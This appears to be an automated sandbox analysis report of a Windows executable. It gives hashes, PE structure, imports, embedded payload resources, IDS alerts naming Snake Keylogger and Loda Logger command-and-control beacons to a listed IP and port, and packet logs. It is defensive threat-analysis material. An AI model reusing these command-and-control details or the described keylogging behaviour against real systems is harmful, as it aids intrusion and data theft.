                                                                                                                SHA256:2d976b78efe5c7e983ff4cef98deb25d21a901e8f954f6d915d5642e75420296
                                                                                                                SHA512:dbb0c03170d807be5e43deb0fd7f1198bb56606cd4bb65d3ccb00b19759336f84c49072baedc6e674db308f58618f58e7d6de24fcb12c7f951de04e7e9c76e1f
                                                                                                                SSDEEP:24576:MnsJ39LyjbJkQFMhmC+6GD9nhloDX0XOf4Z79H8qN3k87zwVb2UDEusw:MnsHyjtk2MYC5GD5hloJf68qIyUDEuL
                                                                                                                TLSH:1C75CF22B2914477D133DA3C9C7BD2FC542ABE712E246B4AFBE42E4D4E3D3812955293
                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                Icon Hash:094699b9b1b98005
                                                                                                                Entrypoint:0x49ab80
                                                                                                                Entrypoint Section:CODE
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                DLL Characteristics:
                                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                                Instruction
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                add esp, FFFFFFF0h
                                                                                                                mov eax, 0049A778h
                                                                                                                call 00007F7768B5BCBDh
                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                call 00007F7768BAF605h
                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                mov edx, 0049ABE0h
                                                                                                                call 00007F7768BAF204h
                                                                                                                mov ecx, dword ptr [0049DBDCh]
                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                mov edx, dword ptr [00496590h]
                                                                                                                call 00007F7768BAF5F4h
                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                call 00007F7768BAF668h
                                                                                                                call 00007F7768B5979Bh
                                                                                                                add byte ptr [eax], al
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000xf0f30.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0xb00000xf0f300xf1000b6dd0d300e3dd3f360697bcf9dba5cf5False0.8903048820020747data7.755808393959913IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                                RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                                RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                                RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                                RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                                RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.08419324577861163
                                                                                                                RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                                RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                                RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                                RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                                RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                                RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                                RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                                RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                                RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                                RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                                RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                                RT_STRING0xb67b80xdcdata0.6
                                                                                                                RT_STRING0xb68940x320data0.45125
                                                                                                                RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                                RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                                RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                                RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                                RT_STRING0xb74040x378data0.41103603603603606
                                                                                                                RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                                RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                                RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                                RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                                RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                                RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                                RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                                RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                                RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                                RT_RCDATA0xb8e040x10data1.5
                                                                                                                RT_RCDATA0xb8e140xdf200PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed0.9224067752100841
                                                                                                                RT_RCDATA0x1980140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                                RT_RCDATA0x1980180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                                RT_RCDATA0x19bc180x64cdata0.5998759305210918
                                                                                                                RT_RCDATA0x19c2640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                                RT_RCDATA0x19c3b80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                                RT_GROUP_CURSOR0x1a0b8c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                RT_GROUP_CURSOR0x1a0ba00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                RT_GROUP_CURSOR0x1a0bb40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                RT_GROUP_CURSOR0x1a0bc80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                RT_GROUP_CURSOR0x1a0bdc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                RT_GROUP_CURSOR0x1a0bf00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                RT_GROUP_CURSOR0x1a0c040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                RT_GROUP_ICON0x1a0c180x14dataTurkishTurkey1.1
                                                                                                                RT_VERSION0x1a0c2c0x304dataTurkishTurkey0.42875647668393785
                                                                                                                DLLImport
                                                                                                                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                                                kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                ole32.dllCLSIDFromString
                                                                                                                kernel32.dllSleep
                                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                                wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                                shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                                advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                                wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                                netapi32.dllNetbios
                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                TurkishTurkey
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-12-30T10:57:56.192769+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.749728172.111.138.1005552TCP
                                                                                                                2024-12-30T10:58:09.817408+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749705216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:09.913069+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749704216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:10.203162+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.74970869.42.215.25280TCP
                                                                                                                2024-12-30T10:58:10.879731+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749712216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:10.918675+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749709216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:12.421827+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749715216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:12.441368+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749716216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:12.936943+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.749728172.111.138.1005552TCP
                                                                                                                2024-12-30T10:58:12.936943+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.749728172.111.138.1005552TCP
                                                                                                                2024-12-30T10:58:13.517215+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749723216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:13.527812+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749721216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:14.517817+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749736216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:14.522804+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749737216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:15.443750+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749748216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:15.443767+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749749216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:16.611701+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749764216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:16.613834+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749763216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:17.594819+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749772216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:17.602167+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749771216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:18.591556+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749785216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:18.599250+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749786216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:19.645197+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749799216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:19.653539+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749800216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:20.615514+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.749808216.58.206.46443TCP
                                                                                                                2024-12-30T10:58:26.813226+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.749728TCP
                                                                                                                2024-12-30T10:58:59.134244+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.749728TCP
                                                                                                                2024-12-30T10:59:35.571823+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.749728TCP
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 30, 2024 10:58:08.773927927 CET49704443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:08.773976088 CET44349704216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:08.774101019 CET49704443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:08.789511919 CET49704443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:08.789544106 CET44349704216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:08.789588928 CET49705443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:08.789632082 CET44349705216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:08.789702892 CET49705443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:08.789906979 CET49705443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:08.789920092 CET44349705216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.424285889 CET44349704216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.424360991 CET49704443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.425152063 CET44349704216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.425203085 CET49704443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.425868988 CET44349705216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.425928116 CET49705443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.426686049 CET44349705216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.426734924 CET49705443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.526498079 CET49704443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.526531935 CET44349704216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.526896954 CET44349704216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.526981115 CET49704443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.527117968 CET49705443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.527148962 CET44349705216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.527565956 CET44349705216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.527667999 CET49705443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.531620026 CET49704443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.531706095 CET49705443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.575340033 CET44349704216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.579320908 CET44349705216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.613115072 CET4970880192.168.2.769.42.215.252
                                                                                                                Dec 30, 2024 10:58:09.617944002 CET804970869.42.215.252192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.618022919 CET4970880192.168.2.769.42.215.252
                                                                                                                Dec 30, 2024 10:58:09.618555069 CET4970880192.168.2.769.42.215.252
                                                                                                                Dec 30, 2024 10:58:09.623334885 CET804970869.42.215.252192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.817410946 CET44349705216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.817912102 CET44349705216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.817986012 CET49705443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.818720102 CET49705443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.818737030 CET44349705216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.819505930 CET49709443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.819564104 CET44349709216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.819639921 CET49709443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.821461916 CET49709443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.821475029 CET44349709216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.830317020 CET49710443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:09.830354929 CET44349710142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.830415010 CET49710443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:09.830961943 CET49710443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:09.830975056 CET44349710142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.913068056 CET44349704216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.913176060 CET49704443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.913552999 CET49704443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:09.913588047 CET44349704216.58.206.46192.168.2.7
